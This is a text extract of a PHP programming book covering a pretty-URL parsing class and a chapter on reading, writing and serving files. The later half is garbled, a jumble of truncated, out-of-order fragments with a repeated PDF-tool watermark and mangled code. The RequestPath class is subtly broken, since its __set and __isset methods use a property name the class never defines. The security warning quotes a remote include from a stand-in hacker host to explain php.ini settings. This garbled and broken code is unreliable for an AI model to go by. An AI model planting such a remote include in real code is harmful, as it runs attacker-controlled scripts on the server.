142 The PHP Anthology Handling Pretty URLs PHP makes the path information available in the $_SERVER['PATH_INFO'] for the AcceptPathInfo or MultiViews solutions, and in $_SERVER['REQUEST_URI'] when using mod_rewrite. We can handle those paths using a simple PHP class that will extract the path information from the incoming request. We’ll call the class RequestPath and give it a single private property, $parts, to hold all the parts of our request URLs: RequestPath.class.php (excerpt) class RequestPath { private $parts = array(); The actual path parsing happens in the __construct method, which simply explodes the path on the forward slash (/) character and then proceeds to handle the first two path elements as special cases before dealing with the key-value pairs that follow them. The first thing we do is grab the path and trim the trailing / character if there is one: RequestPath.class.php (excerpt) public function __construct() { if (isset($_SERVER['PATH_INFO'])) { $path = (substr($_SERVER['PATH_INFO'], -1) == "/") ? substr($_SERVER['PATH_INFO'], 0, -1) : $_SERVER['PATH_INFO']; } else { $path = (substr($_SERVER['REQUEST_URI'], -1) == "/") ? substr($_SERVER['REQUEST_URI'], 0, -1) : $_SERVER['REQUEST_URI']; } Next, we split the path into an array on the / character. The first element we’ll consider to be the action, the second we’ll consider to be the type: Simpo PDF Merge and Split Unregistered Version - http://www.simpopdf.com Forms, Tables, and Pretty URLs 143 RequestPath.class.php (excerpt) $bits = explode("/", substr($path, 1)); $parsed['action'] = array_shift($bits); $parsed[] = $parsed['action']; $parsed['type'] = array_shift($bits); $parsed[] = $parsed['type']; The remaining elements we group into key-value pairs. If an odd number of elements remains, we simply place the last element on the end of our key-value array: RequestPath.class.php (excerpt) $parts_size = sizeof($bits); if ($parts_size % 2 != 0) { $parts_size -= 1; } for ($i = 0; $i < $parts_size; $i+=2) { $parsed[$bits[$i]] = $bits[$i+1]; $parsed[] = $bits[$i+1]; } if (sizeof($bits) % 2 != 0) { $parsed[] = array_pop($bits); } Finally, as the last step of our constructor method, we assign our assembled array of path elements to our class’s private $parts array: RequestPath.class.php (excerpt) $this->parts = $parsed; } We can make use of the __get, __set, and __isset magic methods in our RequestPath class, enabling users of the class to get, set, and test the path element values by using the key as if it were a class property, and keeping our class nice and simple: Simpo PDF Merge and Split Unregistered Version - http://www.simpopdf.com 144 The PHP Anthology RequestPath.class.php (excerpt) public function __get($key) { return $this->parts[$key]; } public function __set($key, $value) { $this->_parts[$key] = $value; } public function __isset($key) { return isset($this->_parts[$key]); } } ?> Using the code is even simpler. Imagine that the incoming request is: http://yourhostname/edit/trackbacks/for/163-My-Example-Page We can access the path information by creating a new RequestPath object: <?php require_once 'RequestPath.class.php'; $request = new RequestPath(); echo "Request action: {$request->action}</br>"; echo "Request type: {$request->type}</br>"; echo "Request for: {$request->for}</br>"; ?> That code should output the following: Request action: edit</br> Request type: trackbacks</br> Request for: 163-My-Example-Page</br> Discussion Once we have pretty URLs set up and functioning, we can start to implement pro- fessional solution architectures such as the Model-View-Controller architecture, or Simpo PDF Merge and Split Unregistered Version - http://www.simpopdf.com Forms, Tables, and Pretty URLs 145 MVC. 16 Pretty URLs are fast becoming an essential requirement for popular sites and it’s important to think about your URLs carefully, and make them as memor- able—or as “guessable”—as possible. Summary In this chapter, we’ve explored a number of ways to make building web forms and tables a whole lot easier, in order to free up our time to focus on the aspects of web development that matter. There’s some degree of commonality between every table and every form, yet our roles as developers involve handling the differences—we can automate the common ground, but we need to learn to handle the aspects that make each case unique. This chapter also gave us a chance to experiment with using the Apache web server and some simple PHP to apply pretty URLs in our web ap- plications. Together, tables, forms, and pretty URLs are common tasks in the working experience of any web developer. The goal of this chapter has been to highlight the aspects of development that we can automate, and to make it easier to handle the parts we can’t. Unfortunately, nothing but experience can make the job easy all the time! 16 http://en.wikipedia.org/wiki/Model-view-controller Simpo PDF Merge and Split Unregistered Version - http://www.simpopdf.com Simpo PDF Merge and Split Unregistered Version - http://www.simpopdf.com Chapter 6 Working with Files Databases make great tools for storing information because they’re fast and, with the help of SQL, easy to navigate. Sometimes, though, you need to be able to access the data stored in a file—be it an image, configuration information, or even a web page on a remote server. PHP makes such work easy with its powerful collection of file functions. The only hard part is choosing the right tool for the job! For the sake of demonstration, I’ve saved a copy of the printable version of Pax Dickinson’s article “Top 7 PHP Security Blunders!,” 1 which we’ll manipulate with PHP’s file functions. The file is saved as writeSecureScripts.html in this book’s code archive. 1 http://www.sitepoint.com/article/php-security-blunders Simpo PDF Merge and Split Unregistered Version - http://www.simpopdf.com 148 The PHP Anthology A Word on Security Before you run riot with PHP’s file functions, think carefully about what you’re doing: you will be making files from your operating system available on a web page that will be exposed to the Internet. Check and double-check the code that accesses files—look for holes in your logic that might allow unwanted access to those files. Be particularly careful when allowing files and directories to be identified via URLs, or to be uploaded or downloaded from your site. This warning also extends to PHP’ s include commands, which can be used to execute scripts included from a remote web server, for example: include 'http://www.hacker.com/bad_script.txt';. Because of the potential for danger, php.ini settings are available to turn off this functionality. allow_url_fopen = Off is used to disable support for the opening of remote files via URLs to the URL-aware fopen wrappers. As of version 5.2, there’s also the allow_url_include setting, which does the same thing for the include, include_once, require, and require_once functions. If allow_url_fopen is turned off, allow_url_include is automatically turned off as well. I’ll be highlighting the potential dangers with each solution so that, with care, you can learn to write secure code. How do I read a local file? There are as many ways to read a local file as you can think of. In this solution, we’ll discuss a couple of the most popular approaches, but if you wish to continue investigating, check out the relevant manual page. 2 Solutions This section covers three options: reading a file as an array, reading a file as a string, and reading a file directly to the screen. 2 http://www.php.net/filesystem/ Simpo PDF Merge and Split Unregistered Version - http://www.simpopdf.com Working with Files 149 Reading a File as an Array First up is PHP’s file function, which reads a file into an array, using the new line character to indicate where a new array element should begin: fileFunc.php (excerpt) <?php $file = file('writeSecureScripts.html'); $lines = count($file); $alt = ''; for ($i=0; $i<$lines; $i++) { $alt = ($alt == 'even') ? 'odd' : 'even'; echo '<div class="' . $alt . '">'; echo $i . ': ' . htmlspecialchars($file[$i]); echo "</div>\n"; } ?> Hey, presto! Up pops the file in a nicely formatted page so you can examine it line by line. We simply loop over the $file variable—an array—with our for loop, and display it as we wish. One thing you may have noticed in the above code is that we used a ternary oper- ator for the alternate row colors in the line after the for loop. A ternary operator takes three arguments and is a shortcut approach to writing a simple if statement. The basic syntax is as follows: (condition) ? true : false The output of our work can be seen in Figure 6.1. Simpo PDF Merge and Split Unregistered Version - http://www.simpopdf.com 150 The PHP Anthology Figure 6.1. Reading a local file as an array Reading a File as a String As of PHP 4.3, the function called file_get_contents reads a file straight into a string without breaking it up: fileGetFunc.php (excerpt) <?php $file = file_get_contents('writeSecureScripts.html'); $file = strip_tags($file); ?> <form> <textarea> <?php echo htmlspecialchars($file); Simpo PDF Merge and Split Unregistered Version - http://www.simpopdf.com Working with Files 151 ?> </textarea> </form> The content of the file is now displayed in an HTML textarea stripped of all its HTML tags. The output is depicted in Figure 6.2. Figure 6.2. Reading a local file as a string Reading a File Directly to the Screen Another way to read a local file is to use the readfile function, which fetches the content of the file and displays it directly on the screen: readFileFunc.php (excerpt) <?php readfile('writeSecureScripts.html'); ?> Simpo PDF Merge and Split Unregistered Version - http://www.simpopdf.com [...]... used the addString method to add to the archive as files some of the data we fetched The first argument represents the path and filename under which the string should be stored; the second is the string itself That should give you a general idea of when Archive_Tar can be useful to you How do I work with files using the Standard PHP Library in PHP 5? With the release of PHP 5, we were given access to the. .. is_readable, to check whether the file can be read ■ is_writable to check whether the file can be written to ■ filemtime to check the date and time at which the file the file was last modified ■ fileatime to find the date and time the file at which was last accessed ■ filesize to check the file’s size We also wrap the result in some custom code to make it more readable: fileInfo .php (excerpt) < ?php // Function... all Solution PHP provides a very handy function for displaying code: highlight_string, which displays PHP code in a presentable manner using the formatting defined in php. ini 8 dir defines the Directory class—one of the predefined classes that are built into PHP You can read more about predefined classes on the manual page at http://www .php. net/manual/en/reserved.classes .php 161 162 The PHP Anthology. .. header('Content-Length: ' filesize($fileName)); readfile($fileName); ?> The Content-Disposition header tells the browser to treat the file as a download (that is, not to display it in the browser window), and gives it the name of the file The Content-Type header also tells the browser what type of file we’re sending it In most cases, the Content-Type should match the type of file you’re sending; however, Internet Explorer... habit of displaying files of recognized types in the browser regardless of the content-disposition header, so we set the MIME type to the made-up value application/x-download for those browsers Working with Files Simpo PDF Merge and Split Unregistered Version - http://www.simpopdf.com Finally, the content-length header tells the browser the size of the file, so that it’s able to display a download... the manual page for fopen ,4 binary mode should always be specified to ensure the portability of your code between operating systems For more information on the various modes that are available, read the manual page Handling Small Files Now that we have a file handle, let’s use it to read the file: 4 http://www .php. net/fopen/ 153 1 54 The PHP Anthology Simpo PDF Merge and Split Unregistered Version -. .. do I work with files using the Standard PHP Library in PHP 5?” Working with Files Simpo PDF Merge and Split Unregistered Version - http://www.simpopdf.com Using the dir Pseudo-Class The alternative approach is to use the dir pseudo-class.8 dir is used in a very similar way to readdir: readdir2 .php (excerpt) < ?php $location = './'; $dir = dir($location); while ($entry = $dir->read()) { if (is_dir($location... http://www .php. net/manual/en/ref.filesystem .php 155 156 The PHP Anthology Simpo PDF Merge and Split Unregistered Version - http://www.simpopdf.com echo file_get_contents('writeSecureScripts.txt'); echo ''; ?> We use the fwrite function to write a string to a file Take note of the mode we used when we opened the new file with fopen The mode w will open the file for writing, beginning at the very start of the file and overwriting... need to move your code to another site, you’ll be able to modify the settings once, rather than hundreds of times throughout your code 163 1 64 The PHP Anthology Simpo PDF Merge and Split Unregistered Version - http://www.simpopdf.com Solution The easiest way to store configuration information is to create the variables in an ini file, then include this file in your code using the parse_ini_file function,... I manage file downloads with PHP? ” Working with Files Simpo PDF Merge and Split Unregistered Version - http://www.simpopdf.com How do I use file handles? To use the file functions we saw in the previous solution, you simply need to point them at the file they have to read, using a path that’s relative to the PHP script that executes the function However, the majority of PHP s file functions use a slightly . it to read the file: 4 http://www .php. net/fopen/ Simpo PDF Merge and Split Unregistered Version - http://www.simpopdf.com 1 54 The PHP Anthology fileHandle .php (excerpt) < ?php $location. http://www.sitepoint.com/article /php- security-blunders Simpo PDF Merge and Split Unregistered Version - http://www.simpopdf.com 148 The PHP Anthology A Word on Security Before you run riot with PHP s file functions,. Merge and Split Unregistered Version - http://www.simpopdf.com 144 The PHP Anthology RequestPath.class .php (excerpt) public function __get($key) { return $this->parts[$key]; } public function